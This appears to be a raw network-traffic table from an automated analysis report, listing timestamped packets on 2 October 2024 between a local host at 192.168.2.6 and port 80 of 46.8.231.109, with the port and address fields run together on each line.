                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170583963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170599937 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170614004 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170761108 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170777082 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170794010 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170804024 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170814037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170818090 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170830965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170838118 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170845032 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170850039 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170881033 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170896053 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.170912027 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171288967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171339989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171350002 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171406984 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171420097 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171432018 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171454906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171468019 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171494007 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171504974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171515942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171545982 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171555996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171598911 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171639919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171694994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171705961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171714067 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171717882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171731949 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171744108 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171761036 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171823978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171833992 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171845913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171869040 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171900034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171926022 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171936035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171952963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.171972036 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.172004938 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.172034025 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.172044992 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.172055960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.172066927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.172081947 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.172106981 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174700975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174721003 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174740076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174750090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174761057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174762011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174772978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174786091 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174794912 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174801111 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174812078 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.174839973 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.175436020 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.175446033 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.175452948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.175491095 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.175501108 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.175512075 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.175518990 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.175523043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.175553083 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.175565004 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176304102 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176352978 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176440954 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176456928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176467896 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176480055 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176482916 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176493883 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176505089 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176525116 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176533937 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176551104 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176553011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176562071 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176572084 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176582098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176600933 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176644087 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176661015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176671982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176681995 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176695108 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176697016 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176722050 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176757097 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176779032 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176789999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176799059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176809072 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176819086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176826954 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176853895 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176917076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176928043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176938057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176968098 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.176981926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177484035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177532911 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177544117 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177556038 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177586079 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177598000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177619934 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177630901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177642107 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177660942 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177702904 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177732944 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177743912 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177755117 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177763939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177778959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177788973 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177789927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177800894 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177819967 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177844048 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177983999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.177994967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178004980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178015947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178025961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178035975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178036928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178045988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178055048 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178061008 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178075075 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178111076 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178133011 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178143978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178153992 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178164005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178174019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178174973 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178184032 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178195000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178195000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178205967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178222895 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178250074 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178272009 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.178309917 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257181883 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257232904 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257242918 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257251024 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257262945 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257272959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257285118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257302999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257316113 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257349968 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257396936 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257396936 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257409096 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257421017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257431030 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257443905 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257443905 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257469893 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257500887 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257530928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257571936 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.257991076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258002043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258013964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258054018 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258066893 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258085966 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258097887 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258109093 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258147001 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258157969 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258169889 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258245945 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258300066 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258332014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258342028 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258352041 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258377075 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258405924 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258428097 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258440971 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258450985 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258476973 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258502007 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258687019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258697987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258752108 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.258995056 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259042025 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259049892 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259061098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259078026 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259088993 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259088993 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259119034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259119034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259129047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259201050 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259212017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259242058 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259259939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259263039 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259270906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259283066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259327888 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259327888 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259362936 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259375095 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259402037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259413004 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259414911 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259423018 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259434938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259444952 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259481907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259506941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259557009 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259567976 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259615898 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259649992 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259661913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259673119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259684086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259695053 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259706974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259716988 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.259742975 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262222052 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262233973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262243986 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262279987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262290955 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262305021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262358904 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262376070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262387991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262398005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262424946 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262438059 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262837887 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262847900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262891054 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262901068 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262912035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262923002 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262940884 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.262976885 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.263005972 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.263016939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.263025999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.263063908 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.263063908 CEST5851580192.168.2.646.8.231.109
